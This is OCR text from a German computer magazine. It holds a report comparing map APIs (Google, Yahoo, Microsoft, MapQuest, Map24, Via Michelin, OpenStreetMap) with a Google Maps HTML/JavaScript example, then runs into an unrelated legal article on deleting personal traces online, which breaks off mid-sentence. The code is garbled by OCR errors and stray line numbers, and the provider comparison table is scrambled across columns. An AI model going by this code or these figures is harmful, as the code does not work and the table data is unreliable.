1 <!DOETYPE html "-//W3C//DTD XHTML 1.0 Strict//EN" 
2 "http://wuw.w3.org/TR/xhtmli/DTD/xhtnl1- 


striet.dtd"> 
3 <html xmlns="http://unn.w3.0rg/1999/xhtnl"> 
4 <head> 
5 <neta http-equiv="content-type" 
content="text/html; charsetzutf-8"/> 
6 stitle>Google Maps JavaScript API Examples/title> 
7 sseript 
sre="http://maps.google.com/maps?filezapikanp; \ 
v=2&anp;key=<Google_Maps API Key>" 
type="text/javascript"></script> 
<script type="text/javascript"> 


function initialize() { 
if (GBrowserlsCompatible()) { 
var map = new GlMap2(document. \ 
getElementByld("karte_heise_verlag")); 
map.setlenter(new GLatLng(52.3804, 9.8077), 


} 
} 


d 
9 
0 
1 
2 
3 


</script? 
</head> 
<body onload="initialize()" onunload="GUnload()"> 
<div id="karte_heise_verlag" 
style="width:500px; height: 300px"></div> 
22 </body> 
23 </htnl> 


4 
5 
5 
6 
7 
d 
9 
0 
1 


2 
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Während getLatLng() lediglich das 
wahrscheinlichste Koordinatenpaar zur 
vorgegebenen Adresse liefert, gibt ger- 
Locations() eine Liste von Placemark- 
Objekten mit Statuswerten und Grün- 
den für eventuell aufgetretene Fehler 
zurück. Eine inverse Geokodierung, die 
zu einem Koordinatenpaar die passende 
Adresse ermittelt, bietet Googles API 
nicht. Jedoch stellt ein findiger Pro- 
grammierer einen solchen Dienst als 
Erweiterung auf seinen Internetseiten 
bereit (siehe iX-Link). 

Zur Verknüpfung von Ereignissen 
(Events) mit den auf sie reagierenden 
Funktionen dient GEvent.addListener(). 
Sie erwartet als Parameter ein Objekt, 
ein Ereignis und den Listener dafür. 
Typische Ereignisse sind Mausklicks, 
Tastendrücke und das vollständige La- 
den der Karte. 


WE Yahoo Maps 


Yahoos Kartenangebot konzentriert 
sich auf Nordamerika und Europa. Für 
Indien gibt es zurzeit Daten im Betasta- 
dium. Auffallend an dem Kartenmaterial 
ist die vorzügliche grafische Gestal- 
tung, die zu einer besseren Lesbarkeit 
führt als viele Konkurrenzangebote. 
Verschiedene Straßentypen und Kar- 
tenmerkmale lassen sich einfach unter- 
scheiden und schnell erfassen. Damit 
kommt Yahoo Maps dem vertrauten 
Erscheinungsbild gedruckter Karten am 
nächsten (siehe Abb. ?). 

Yahoo Maps läuft vollständig in 
Flash. Zusätzlich zu den drei APIs dafür 
(Javascript, Actionscript und Flex) bie- 
tet es eine Ajax-Schnittstelle sowie eine 
reduzierte Image-API zur einfachen Ab- 
frage von Rasterbild-Karten an. Dane- 
ben gibt es vergleichbar den Google 
„My Maps“ eine „Simple-API“, die aber 
keine API im klassischen Sinne ist. Da- 
mit lassen sich Kartenausschnitte mit 
nutzereigenen Daten über RSS anrei- 
chern. Man kann bis zu 100 Marker set- 
zen, die Karten lassen sich jedoch nicht 
in eigene Seiten einbauen, man darf le- 
diglich einen Link auf sie setzen. 

Die Flash-API bietet ähnliche Funk- 
tionen wie Googles Programmierbiblio- 
thek zum Setzen von Markern, Zeichnen 
von Linienzügen und Formen in die 
Karten, zum lokalen Suchen und für das 
Einbinden eines GeoRSS-Datenstroms. 
Unterschiede zeigen sich jedoch in der 
Implementierung der Objekte und Me- 
thoden. Eine Geokodierungsfunktion ist 
in die API integriert, sodass Funktio- 
nen, die eine Positionsangabe erwarten, 
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Von Yahoo Maps 
angebotene Karten 
ähneln dem Erschei- 

nungsbild gedruckter 
Alternativen (Abb. 2). 


Microsoft stellt für 

die Darstellung seiner 
Live-Maps-Daten ein 
eigenes Control zur 
Verfügung (Abb. 3). 


Map Quest stellt 
seine API in mehreren 
Programmier- 
sprachen bereit, was 
sie für Unterneh- 
mensapplikationen 
interessant macht 
(Abb. 4). 


Map24 orientiert 
sich bei der Dar- 
stellung an der 
von Navigations- 
geräten (Abb. 5). 
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REPORT 


Geodienste 


Gemeinsamkeiten 


Alle Kartendienste haben einige grund- 
legende Eigenschaften gemeinsam: 


— Bevor sie mit dem Programmieren an- 
fangen können, brauchen Entwickler ei- 
nen eindeutigen Schlüssel, den es auf der 
Website des Anbieters gibt. Er ist an ei- 
ne bestimmte Internetadresse oder eine 
Verzeichnisstruktur gebunden und dient 
der eindeutigen Identifizierung gegen- 
über dem Anbieter. Außerdem erfasst er 
damit die Zugriffe auf seine API. Über- 
schreiten sie eine vereinbarte Grenze, 
lässt er keine weiteren Zugriffe mehr zu, 
bis das dem Limit zugeordnete Zeitinter- 
vall abgelaufen ist. 


Im Allgemeinen besitzen die Program- 
mierschnittstellen Komponenten: 


— UI-Elemente zur Kontrolle (Zoom, 
Auswahl des Kartentyps), Anzeige (Ska- 
lierung) und Navigation (Verschieben, 
Übersichtskarte). 


-Einblendbare Ebenen, die mit einer Po- 
sitionsangabe verknüpft sind. Auf ihnen 
liegen Elemente zur Kennzeichnung von 
Orten oder Bereichen sowie Fenster zur 
Anzeige weitergehender Information 
oder eigenes Kartenmaterial, Skizzen 
und Bilder. 


— Zusatzdienste der Anbieter (zum Bei- 
spiel aktuelle Verkehrsdaten, Geokodie- 
rung, Routenplanung). 


Adressen oder Koordinaten akzeptieren. 
Für das Zeichnen von Linienzügen mit 
dem Objekt PolylineOverlay ist anders 
als in Google Maps eine XML-Datei mit 
den Koordinaten erforderlich. 

Das Setzen eines Markers erfolgt in 
zwei Schritten: Erst den Typ festlegen, 


Microsoft Virtual Earth Map Control 6.0 


anschließend seine Position definieren. 
Mehrere Marker können in einem Ar- 
ray übergeben werden. Etwas Ähnli- 
ches wie Googles MarkerManager bie- 
tet Yahoo nicht. 

Dank Flash offeriert Yahoos API 
wesentlich mehr Gestaltungsmöglich- 
keiten als die der anderen Anbieter. 
Zwei schöne kleine Beispiele inklusive 
Quellcode hat Justin Everett auf seinen 
Webseiten bereitgestellt. Sie demons- 
trieren, wie sich interaktive Karten 
nahtlos und visuell ansprechend in vor- 
handenes kundenspezifisches Design 
einbetten lassen. Dazu verwenden Ent- 
wickler die Objekte CustomSWFMar- 
ker, CustomSWFOverlay, CustomSWF- 
Tool, CustomSWF Widget. 

Auch mit Yahoos Ajax-API sieht 
das Grundgerüst zum Einbinden eige- 
ner Karten dem Google’schen verblüf- 
fend ähnlich. Diese Schnittstelle bietet 
von einigen Ausnahmen abgesehen 
dieselben Funktionen wie die Flash- 
API. Alle Klassen, die sich direkt auf 
Flash beziehen, fehlen klarerweise. Für 
Verkehrsinformationen und Geokodie- 
rung bietet Yahoo außerdem Webdiens- 
te an, die sich über ein REST-Interface 
ansprechen lassen. 


WE Microsoft Live Maps 


Live Maps ist die Oberfläche, unter der 
Microsoft seinen Kartendienst anbietet. 
Im Hintergrund kümmern sich das 
Virtual Earth SDK und der Map Point 
Webservice um Geokodierung, Ver- 
waltung des gekachelten Kartenmateri- 
als, Ebenenverwaltung et cetera (siehe 


Yahoo Maps 3.5.2 


maps.yahoo.de maps.live.de 


Abb. 3). Für die Webprogrammierung 
mit Live Maps steht das Virtual Earth 
Map Control zur Verfügung. 

Die aus Live Maps bekannten Dar- 
stellungsmodi wie 3D-Ansicht (nur für 
Windows) sowie die Luftbilder aus der 
Schrägansicht für ausgewählte Städte 
stehen auch im Map Control zur Verfü- 
gung. Das Kontextmenü lässt sich an ei- 
gene Wünsche anpassen. Shape Layers 
erlauben es, eine beliebige Kombination 
von Markern, Linien und sonstigen Aus- 
zeichnungselementen zu gruppieren und 
so gemeinsam zu verwalten. Beliebig 
viele Marker lassen sich in einem Funk- 
tionsaufruf setzen. Ebenenüberlagerun- 
gen kann man einen räumlichen Index 
zuweisen, sodass sie unter- beziehungs- 
weise oberhalb einer anderen Ebene 
erscheinen. 

Wer eine Entwicklerkennung für 
Map Point besitzt, kann den Geoko- 
dierungsdienst nutzen, der präziser ar- 
beitet als der von Virtual Earth. Ähnlich 
wie in Google Maps kann man eigenes 
Kartenmaterial, das in die Virtual-Earth- 
Projektion umgerechnet, gekachelt und 
indiziert werden muss, nachladen und 
so seinen eigenen Kartendienst reali- 
sieren. Dabei hilft das ebenfalls von 
Microsoft angebotene freie Werkzeug 
Map Cruncher. 


WE Map Quest 


In der kommerziellen Version seiner 
Advantage API bietet Map Quest An- 
bindungen an Javascript, Java, C++, 
‚Net und Actionscript 3.0. Dies macht 
sie insbesondere für Unternehmens- 


Map Quest OpenAPI Beta 
www.mapquest.com,/features/main. 
adp?page=developer_tools_oapi 


Produkt Google Maps 2.95 
Website maps.google.de 
Abdeckung weltweit, jedoch regional 


unterstützte Programmiersprachen 


Limits Karte! 


Limits Geokodierung' 


Funktionen? 


Nutzungsbedingungen 
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unterschiedlicher Detaillierungsgrad; 
für Deutschland 100 % Abdeckung 
AIMX: Javascript 


unbegrenzt; bei mehr als 500 000 
erwarteten Zugriffen pro Tag 
Abstimmung 

50 000 Aufrufe pro Tag 


Geokodierung (explizit), Umkreissuche 
(über Local Search), Routing, 
Verkehrsinformationen (USA), GeoRSS, 
eigenes Kartenmaterial 

Key, kostenfrei nur für nicht- 
kommerzielle Dienste 


Nordamerika und Europa; für Indien 
im Betastadium 


Flash API: Javascript, Actionscript 2.0, 
Adobe Flex 1.5; AIAX: Javascript 


50 000 Zugriffe pro IP-Adresse 
und Tag 


5000 Aufrufe pro Tag 


Geokodierung (implizit & explizit), 
Umkreissuche (über Local Search), 
Routing, Verkehrsinformationen, 
GeoRSS 


Key 


Nordamerika, Europa und Japan sowie 
ausgewählte Großstädte weltweit 


AJAX: Javascript 


unbegrenzt, kein Download von mehr 
als 250 POI 


50 000 Aufrufe pro Tag 
Geokodierung (explizit), Routing, 


Verkehrsinformationen (USA)* 


Key, kostenfrei für nichtkommerzielle 
Dienste bzw. die ersten 90 Tage bei 
kommerzieller Nutzung 


Nordamerika, Europa, Südafrika und 
Teile des Mittleren und Nahen Ostens 
sowie Südostasiens 

OpenAPl Beta: Javascript 


50 000 Zugriffe pro Tag inklusive 
Geokodierung; 5000 Routenberechnungen 
pro Tag 

5.0. 


Routing 


Key, kostenfrei nur für nicht- 
kommerzielle Dienste 
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applikationen interessant. Eine kosten- 
lose Javascript-API ist unter dem Na- 
men OpenAPI Beta ebenfalls vorhanden 
(siehe Abb. 4). 

Auf dem Client erfolgt die Anzeige 
in Flash, in der OpenAPI hingegen klas- 
sisch mit synchroner HTTP-Kommuni- 
kation zwischen Client und Server. Jede 
Interaktion löst ein vollständiges Neula- 
den der gesamten Seite aus. Bemerkens- 
werterweise verwendet Map Quest auf 
seinen Seiten immer noch dieses Inter- 
face, obwohl mit der eigenen API eine 
komfortablere Lösung möglich wäre. 

Die OpenAPI verfügt über die üb- 
lichen Funktionen wie das Setzen von 
Markern (maximal 100 pro Karte), die 
implizite oder explizite Geokodierung 
(durch das Objekt MOGeocode oder per 
REST-Abfrage), Routenberechnung so- 
wie in begrenztem Maß das Verändern 
der Bedienelemente und des Layouts. 
Die OpenAPI bedient sich eines re- 
duzierten Kartenobjekts, vollen Zugriff 
und Flexibilität erhält man erst mit der 
kommerziellen Advantage API. 


WE Map24 


Hinsichtlich der grafischen Gestaltung 
erinnert Map24 an Navigationsgeräte 
(siehe Abb. 5). Es verwendet als Kar- 
tenmaterial ausschließlich vektorisierte 
Straßenkarten ohne topografische Merk- 
male. Dafür sind Straßenverkehrsinfor- 
mationen und die Anzeige verschie- 
dener POI (Points of Interest), zum 
Beispiel Tankstellen oder Radarfallen, 
sowie eine Hotelsuche und -buchung in 
die Oberfläche integriert. Map24 gehört 


Online sehen die „SU\ 1“ melansor 


Karten von Via Bo 

Michelin genauso » \( 
aus wie in Michelin- 
Straßenatlanten 
(Abb. 6). 


zu den wenigen Anbietern, die Daten für 
Afrika vorrätig haben. 

Die Anzeige der Karten erfolgt ähn- 
lich wie bei der Konkurrenz wahlweise 
in einem Java-Applet oder als Bitmap. 
Die Dokumentation nennt diesen An- 
zeigemodus „statische Karte“ im Un- 
terschied zu Vektorgrafiken, die sie als 
„interaktive“ bezeichnet. Sie lassen sich 
anders als gekachelte Bitmaps ohne 
Qualitätsverlust stufenlos vergrößern 
und ermöglichen die Interaktion mit 
Objekten bis hinunter auf Straßen und 
Gebäude. 

Die Funktionen der Map24-Technik 
bildet die MapTP-API ab. Neben 
Schnittstellen für PHP, Java, C++, 
SOAP und WMS (Web Mapping Ser- 
vice) gibt es eine Ajax-API, die als ein- 
zige kostenlos ist. Sie umfasst nahezu 
dieselben Funktionen wie die Webser- 
vices. Tatsächlich sind große Teile des 
Javascript-Codes automatisch aus den 
WSDL-Dateien (Web Service Defini- 


3% AN 


| ; We 
DENT Alfeld I 8 


tion Language) generiert. Fehlt eine 
Wrapper-Klasse für eine Funktion, lässt 
sie sich immer noch via Webservices in 
eigene Anwendungen integrieren. 

MapTP bietet neben den Standard- 
funktionen eine Reihe besonderer 
Merkmale. So lässt sich der Suchbe- 
reich bei einer Umkreissuche nicht nur 
auf eine Region beschränken, sondern 
der Anwender kann die einzubeziehen- 
den thematischen Ebenen auswählen. 
Eine Spezialität ist die Umkreissuche 
mit vorgegebener Fahrtzeit: Sie findet 
Objekte, die vom Standort aus in- 
nerhalb einer bestimmten Zeitspanne 
zu erreichen sind. Routen lassen sich 
animiert abfahren, für verschiedene 
Fortbewegungsarten und Fahrzeug- 
typen ermitteln, mit beliebig vielen 
Zwischenstationen versehen oder für 
alle möglichen Kombination aus Orts- 
punkten berechnen. Ein Dienst für ak- 
tuelle Verkehrsinformationen rundet 
das Angebot ab. 


Map Quest Advantage API 5.1 
company.mapquest.com//mgbs/4.html 


Nordamerika, Europa, Südafrika und 
Teile des Mittleren und Nahen Osten 
sowie Südostasiens 


Advantage API 5.1: Javascript, C++, 
Java, .Net, Actionscript 3.0 


k.a? 


ka? 


Geokodierung (explizit), Routing, 
Umkreissuche 


Key? 
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Map24 MapIP API 


www.de.map24.com 


Nord- und Südamerika, Europa, Naher Osten, 


weite Teile Afrikas, Australien 


Web: PHP, AJAX API 2.1; Webservices 


(SOAP, teilweise HTTP-GET); MapTP API v5.2: Java, 
C++, ActiveX-Komponente, Windows CE und 


Symbian DLL; 06C WMS 1.1.1 


10.000 Sessions oder 10 000 Transaktionen 
(Geokodierung, Suchanfrage und Routing) 


pro Tag 
5.0. 


Geokodierung (explizit), Umkreissuche 
(Entfernung, Dauer), Routing 
(Spezialität: Matrix), Verkehrsinfor- 
mationen 

Key, kostenfreie Nutzung nur mit 

der AIAX.API möglich 


Open Street Map/Open Layers 
www.openstreetmap.org, 
www.openlayers.org 

Schwerpunkt Mittel- und Nordeuropa, 
laufende Erweiterung 


Open Layers Javascript APl v2.5 

keine 

nicht angeboten 

Erweiterung der Funktionen mit WMS, 


WFS-Dienste, eigenes Kartenmaterial 


Kartenmaterial: Creative Commons, 
Share Alike Lizenz Software: Gnu GPL 


Via Michelin 


www.viamichelin.com 


Schwerpunkt Europa und 
ausgewählte Städte weltweit 


AIMX: Javascript Maps & Drive AP; 
Webservices v2.0 (SOAP, WSDL) 


10 000 Anfragen pro Tag für Karten 
und Hotelsuche 


1000 Zugriffe pro Tag inklusive 
Hotelsuche 

Routenberechnung (nicht nur für 
Autofahrer), Wetterinformationen, 
Geokodierung, Umkreissuche, 
Hotelsuche und -buchung 

Key, kostenfrei ausschließlich für 
nichtkommerzielle Dienste 


105 


REPORT 


Geodienste 


r 
Neustadt 
am Rübenberge 


A 


Hannover 


en . 
Gehrden f 5 
Pattensen 


Wennigsen 
(Deister) 
, J Sarstedt 
Springe 
Bad“ 
Nordstemmen __ 


EIN >; Im7 - 


Map24 bietet für seine API eine 
Vielfalt an Programmiersprachen, Platt- 
formen und eine breite Browser-Kom- 
patibilität, die einen Einsatz auf mehr 
Geräten erlaubt als bei anderen Anbie- 
tern. Jedoch gestaltet sich die Entwick- 
lung mit der MapTP umständlicher als 
mit manch anderer API, was zum Teil 
an der direkten Umsetzung von WSDL 
in Javascript-Klassen liegt. 


I] Via Michelin 


Vor Kurzem hat sich Via Michelin aus 
dem Markt der persönlichen Naviga- 
tionsgeräte zurückgezogen, bietet aber 
weiterhin seine Software und Naviga- 
tionsdienste für mehr als 200 Länder an, 
davon für über 30 mit detailliertem Stra- 
Ben- und Wegenetz. Bei einer mittleren 
Auflösung entsprechen die Onlinekarten 
exakt der gedruckten Fassung aus den 
Michelin-Straßenatlanten mit ihren zahl- 
reichen Merkmalen wie Aussichtspunk- 
ten und landschaftlich reizvollen Stre- 
ckenabschnitten (siehe Abb. 6). 

Via Michelin bietet zum Programmie- 
ren die Javascript-API Maps & Drive so- 
wie eine auf Webservices mit SOAP und 
WSDL aufbauende kostenpflichtige Va- 
riante. Von Maps & Drive gibt es eine 
kostenlose eingeschränkte Version. 

Als einziger der hier dargestellten 
Anbieter verfügt Via Michelin über ei- 
ne Routenberechnung nicht nur für 
Autofahrer, sondern auch für Motor- 
radfahrer, Wohnmobile, Radfahrer und 
Fußgänger. Hinzu kommt die Möglich- 
keit, den Wagentyp zu spezifizieren 
und sich die Sprit- und Mautkosten 
ausrechnen zu lassen. Ein Nachteil: 
Für eine Routenberechnung darf man 
neben Start- und Endpunkt maximal 
drei Zwischenstationen angeben. 

Ausschließlich die kommerzielle 
Version der API bietet inverse Geoko- 
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Burgdorf 


Lehrte ug 


Die Daten der 
Open-Street-Map- 
Karten stammen 
von Freiwilligen 
und stehen unter 
einer freien Lizenz 


(Abb. 7). 


Peine 


/ 


dierung, die Suche nach POI, die man 
allerdings vorher auf den Via Michelin- 
Servern speichern muss, und aktuelle 
Wetterinformationen. 


WE Open Street Map 


Open Street Map [2] ist eine Samm- 
lung von Karten, die eine Gemeinschaft 
Freiwilliger erstellt. Sie ist frei verfüg- 
bar und steht unter der Creative-Com- 
mons-Lizenz. Noch befindet sich das 
Projekt in der Aufbauphase: Obwohl 
das Straßen- und Wegenetz kontinuier- 
lich wächst (siehe Abb. 7), gibt es viele 
Lücken, vor allem außerhalb Nordame- 
rikas und Europas. 

Eine Besonderheit des Projekts ist 
die Möglichkeit, eigenes Kartenmateri- 
al und damit auch ein eigenes Design 
zu verwenden. Dabei übernimmt die 
Software die Verwaltung und das Dar- 
stellen der Karten sowie die Interak- 
tionssteuerung. Es gibt mehrere Syste- 
me, die die Aufbereitung eigener Karten 
(Umrechnung der Koordinaten, Projek- 
tion, Kachelung, Indizierung et cetera) 
erledigen können. 

Open Street Map-Karten lassen sich 
mit der freien Javascript-API Open Lay- 
ers in eigene Seiten einbinden. Sie 
orientiert sich an den Schnittstellen von 
Google und Microsoft. Open Street Map 
ist für die Anzeige und Navigation in 
Karten konzipiert und bietet bislang 
weder Routenplanung noch Adress- 
suche. Die Suche nach Ortsnamen ist 
jedoch möglich. Mit Open Layers kön- 
nen Entwickler OGC-konforme (Open 
Geospatial Consortium) WMS- und 
WFS-Dienste (Web Feature Service), 
die Rasterbilder oder Vektorgrafiken lie- 
fern, als Ebenenüberlagerung einbinden. 

Das Wiki-Prinzip ist die Achillesfer- 
se von Open Street Map. Entscheidend 
für den Erfolg wird sein, ob die An- 


wender genügend Strecken aufzeichnen 
und so eine hohe Abdeckung erreichen 
- und diese Wege anschließend in sinn- 
volle Karten verwandeln. Inzwischen 
hat Open Street Map einen kommer- 
ziellen Partner gefunden, der in Groß- 
britannien eine Suchmaschine für Im- 
mobilien anbietet: Parallel zu einer 
Google-Maps-Version betreibt Nestoria 
einen Server, der ausschließlich Open 
Street Map-Karten verwendet, jedoch 
die Google-Technik für Datenmanage- 
ment und Darstellung nutzt. 


F] Fazit 


Bevor es an die Auswahl einer passen- 
den API für das eigene Mapping-Pro- 
jekt geht, sollten die folgenden Fragen 
beantwortet sein: Welches Kartenmate- 
rial ist erforderlich? Sollen eigene Kar- 
ten eingebunden werden? Was sollen 
die Karten darstellen? Welche Daten 
liegen bereits vor und in welcher Form? 
Reichen Ebenenüberlagerungen aus 
oder ist ein eigenen Kartenserver nötig? 
Welche Programmiersprache kommt 
zum Einsatz? Soll die Anwendung frei 
im Internet verfügbar sein oder nur im 
Intranet? Wen umfasst die Zielgruppe? 
Sollen Kartendienste auf mobilen Ge- 
räten laufen? 

Erst ihrer Beantwortung sollte die 
Wahl einer API folgen. Unschlüssige 
dürfen alle Bibliotheken zumindest für 
einen begrenzten Zeitraum kostenlos 
testen. Javascript-Entwicklern, die un- 
abhängig von einem bestimmten An- 
bieter bleiben wollen, hilft eine Biblio- 
thek wie Mapstractions. Sie abstrahiert 
von den APIs und ermöglicht so einen 
einfachen Wechsel zwischen den Kar- 
tendiensten. Ein späterer Umstieg ist 
damit einfach möglich. (ck) 
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riere stoppen.“ Mit solchen Titeln 

warnen Zeitungen regelmäßig da- 
vor, unüberlegt Informationen über die 
eigene Person auf Webseiten zu hinter- 
lassen, die man später bereut. Fast je- 
der fünfte Deutsche (18 Prozent) hat 
bereits Informationen über sich im 
Internet veröffentlicht, in der Genera- 
tion der 14- bis 29-Jährigen ist es gar 
jeder Zweite, meldete kürzlich der 
Branchenverband Bitkom. Und nicht 
nur für Stellenbewerber, auch für 
Unternehmen ist es wichtig, einige 
Spielregeln bei der Selbstdarstellung 
im Internet einzuhalten. 

Brisant ist es ebenfalls, wenn sich 
Dritte über eine andere — natürliche 
oder juristische — Person auslassen und 
Informationen bereitstellen. Rechtliche 
Ansprüche können in manchen Fällen 
zwar helfen, das Schlimmste zu ver- 
meiden, in manchen Fällen jedoch 
nicht. Zudem ist die Durchsetzung 
rechtlicher Ansprüche häufig mit eini- 
gem Nerven- und Geldaufwand ver- 
bunden. Und selbst dann bleiben oft di- 
gitale Spuren zurück, die noch nach 
vielen Jahren präsent sind. 

Um sich einen Überblick über die ju- 
ristische Lage bei missliebigen Informa- 
tionen im Internet zu verschaffen, muss 
man zunächst nach deren Herkunft fra- 
gen. Hat man sie selbst oder durch ei- 
nen Vertreter in das Internet stellen las- 
sen, ist die rechtliche Situation eine 
gänzlich andere, als wenn unabhängige 
Dritte Informationen über eine Person 
oder Firma veröffentlichen. 

Wie wichtig die Kontrolle über die 
eigene Identität im Internet ist, zeigt ei- 
ne Befragung des Bundesverbandes 
Deutscher Unternehmensberater (BDU) 
im Herbst 2007. Ihr zufolge prüft ein 
Drittel der Personalvermittler die vir- 
tuellen Spuren eines Bewerbers, bevor 
er eine Einladung zum Vorstellungsge- 
spräch bekommt. Dabei haben schon 
die Hälfte der Personalvermittler Be- 
werber wegen zweifelhafter Informatio- 
nen aus dem Internet aus dem Verfah- 
ren genommen. 


5 puren im Internet können die Kar- 


Den gröbsten Image- 
Schaden verhindern 


Mit Dienstleistern im Bereich Image- 
Management kann man zwar Einfluss 
auf die Anzeige von Treffern in Such- 
maschinen nehmen und die unliebsamen 
unter ihnen im Suchergebnis nach hin- 
ten rutschen lassen. Claim-ID, Spock, 
myON-ID, Naymz et cetera können 
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Wer darf oder muss Spuren im Internet löschen? 


Tobias Haar 


Das Internet vergisst nicht. 
Noch Jahre, nachdem man 
Informationen ins Netz 
gestellt hat, sind sie dort zu 
finden. Wer als Stellen- 
bewerber oder Unternehmer 
auf einen guten Ruf ange- 


Pa 


wiesen ist, sollte nicht nur darauf achten, 
was er über sich im Internet preisgibt, 


sondern auch, was er gegebenenfalls wieder entfernen kann. 


Internet-Informationen aber nicht besei- 
tigen. Wer missliebiges Material ent- 
fernt wissen möchte, kann sich natürlich 
an den jeweiligen Diensteanbieter wen- 
den und ihn darum bitten. Was aber, 
wenn dieser dem Ansinnen nicht nach- 
kommt oder gar erhebliche Gebühren 
dafür verlangt? 

Auf der diesjährigen Konferenz 
„Computers, Freedom, and Privacy 
2008“ (CFP) in New Haven, USA, wur- 
de die Forderung nach einem „Eigent- 
umsrecht“ an persönlichen Daten laut. 
Einem solchen Recht könnte — ähnlich 
dem Urheberrecht oder dem Patentrecht 
— verfassungsrechtlicher Schutz zukom- 
men, womit man die Durchsetzung von 
Ansprüchen etwa auf Löschung persön- 
licher Daten in sozialen Netzwerken et 
cetera wesentlich verbessern würde. 

Auch in Deutschland gibt es Überle- 
gungen, dem Recht auf informationel- 
le Selbstbestimmung Verfassungsrang 
einzuräumen und das Grundgesetz ent- 
sprechend zu ändern. Hierzulande ist 
man durch das Datenschutzgesetz aber 
schon vergleichsweise gut gegen den 
Missbrauch eigener personenbezogener 
Daten und Informationen geschützt. 
Vor beleidigenden Meinungsäußerun- 
gen gegen die eigene Person schützen 
Strafgesetzbuch sowie Bürgerliches 
Gesetzbuch. 

Wer Unwahrheiten über andere ver- 
breitet, kann auf Unterlassung und Be- 
seitigung etwa von Einträgen auf Web- 


seiten in Anspruch genommen werden. 
Zudem muss er die Kosten dafür tragen. 
Zwar gibt es das von der Verfassung 
geschützte Recht auf freie Meinungs- 
äußerung. Es wird jedoch nicht — wie es 
in der Fachsprache heißt — schrankenlos 
gewährt. Kurz gesagt hört es da auf, wo 
die schutzwürdigen Interessen anderer 
beginnen und überwiegen. 


Onlinearchive - das 
Gedächtnis des Internet 


Wer selbst Informationen über sich 
preisgibt, hat es da schon schwerer, sei- 
ne Interessen rechtlich durchzusetzen. 
Auf der eigenen Webseite kann man 
heikle Passagen einfach ändern oder 
vom Netz nehmen. Das ist noch relativ 
einfach zu beherrschen. Problematisch 
sind dann nur noch die Onlinearchive 
(zum Beispiel www.archive.org), da 
man mit ihrer Hilfe Webseiten auch 
noch Jahre nach dem Entfernen ausfin- 
dig machen und anzeigen lassen kann. 
Immerhin sind die betroffenen Inhalte 
nicht mehr online und nach einer Weile 
meist auch über den Cache-Speicher 
von Suchmaschinen nicht mehr auf- 
findbar. 

Begibt man sich mit seiner Identität 
in soziale Netzwerke wie StudiVZ, Face- 
book oder Xing, kann man sich unter 
Umständen ebenfalls an den Betreiber 
wenden und um Löschung nachsuchen. 
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möglich sein, und es sind „daten- 


Besbedan Aeruhı Errmeden Era 


a Issue Paar May «| Mm: 


schutzfreundliche Standardeinstel- 


Alle Ergebnisse zu Peter Mayer 


Wer einen Allerweltsnamen trägt, geht 
in der Masse der Namensgleichen unter, 
Alle anderen sollten mit der Preisgabe 
von Informationen im Internet zurück- 
haltend sein, 


Überdies existieren häufig — wenngleich 
an versteckter Stelle — Möglichkeiten, 
sein Profil aus einem solchen Netzwerk 
vollständig zu löschen. Gegen die miss- 
bräuchliche Verwendung persönlicher 
Angaben durch den Plattformbetreiber, 
etwa durch Profilerstellungen, die ande- 
ren Nutzern zugänglich gemacht werden 
et cetera, schützt in Deutschland das 
Telemediengesetz und das Recht der 
allgemeinen Geschäftsbedingungen. Da- 
rüber hinaus bestehen umfassende da- 
tenschutzrechtliche Grenzen, auf die der 
Anbieter achten muss. 

Hierauf hat auch der „Düsseldorfer 
Kreis“, das Koordinationsgremium der 
datenschutzrechtlichen Aufsichtsbehör- 
den für den nichtöffentlichen Bereich 
hingewiesen. Auf ihrer Sitzung im April 
2008 zum Datenschutz bei sozialen Net- 
zen im Internet erläuterten sie die An- 
bieterpflichten. Insbesondere aus dem 
Telemediengesetz ergibt sich die Ver- 
pflichtung, die Nutzer umfassend zu 
unterrichten, sowie das Recht des Nut- 
zers zum Widerspruch bei der Verwen- 
dung von Profil- und Nutzungsdaten. 
Weiter trifft den Anbieter die Pflicht zur 
Löschung von Nutzungsdaten, wenn er 
sie nicht oder nicht mehr zur Abrech- 
nung benötigt. 

Nur wenn eine wirksame Einwilli- 
gung des Betroffenen (die dieser auch 
widerrufen kann) vorliegt, darf eine 
weitergehende Nutzung erfolgen. Aus- 
drücklich wiesen die Datenschutzbe- 
hörden darauf hin, dass eine ‚„voraus- 
eilende Speicherung von Daten über 
die Nutzung sozialer Netzwerke (...) 
für eventuelle zukünftige Strafverfol- 
gung“ unzulässig ist, da dafür keine 
Rechtsgrundlage besteht. Vielmehr 
müsse grundsätzlich eine anonyme oder 
pseudonyme Nutzung solcher Dienste 
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lungen“ vorzusehen. 

€ Nach Auffassung von BMI- 
Staatssekretär Peter Altmaier ge- 
hen die größten Gefahren für die 
informationelle Selbstbestimmung 
derzeit von der privaten Internet- 
Nutzung aus, so Altmaier im April 
auf einer Tagung der Gesellschaft 
für Informatik. Dies belege auch 
das Beispiel von monster.com aus 
dem vergangenen Jahr. Der Inter- 
net-Jobbörse waren durch Daten- 
diebstahl 1,3 Millionen Datensätze 
mit Lebensläufen und Bewerbungs- 
unterlagen abhanden gekommen. 
Einen Missbrauch dieser Datensät- 
ze kann man wohl nicht mehr ver- 
hindern. Dem Betroffenen drängt 
sich aber die Frage nach Schadens- 
ersatz auf, wenn beispielsweise IT-Si- 
cherheitsstandards grob vernachlässigt 
wurden. 

Schwierig ist ebenso die Frage nach 
einem Anspruch auf Löschung eines ei- 
genen Kommentars oder einer Mei- 
nungsäußerung beispielsweise in einem 
Internet-Forum. Gerichtsentscheidungen 
aus diesem Bereich sind noch nicht be- 
kannt. Juristisch ist hier von Bedeutung, 
welche vertraglichen Beziehungen zwi- 
schen Nutzer und Betreiber bestehen, 
die Regelungen zu einem Löschungsan- 
spruch enthalten können. 

Wenn es in einem Forum technisch 
keine Option gibt, eigene Äußerungen 
auch wieder selbst zu löschen, sieht es 
für den Nutzer meist nicht so gut aus. 
Die AGB der Betreiber sehen Lö- 
schungsansprüche in den allerwenigs- 
ten Fällen vor. Aus dem Gesetz lässt 
sich ein solcher Anspruch nur schwer- 
lich herleiten. Denn immerhin hat der 
Nutzer — es sei denn die konkreten 
Umstände des Einzelfalls deuten auf 
eine zeitlich befristete Einräumung ei- 
ner Veröffentlichungsbefugnis für den 
Betreiber hin — selbst den Beitrag ins 
Netz gestellt. 


Kein gesetzlicher 
Löschanspruch 


Da es also an klaren gesetzlichen Re- 
gelungen fehlt und auch die AGB nicht 
weiterhelfen, bleibt nur, mit vertrag- 
lichen Nebenpflichten zu argumentie- 
ren. Vielleicht dringt man vor Gericht 
mit der Begründung durch, der Betrei- 
ber habe wegen dieser Pflichten auf die 
berechtigten Interessen des Nutzers an- 
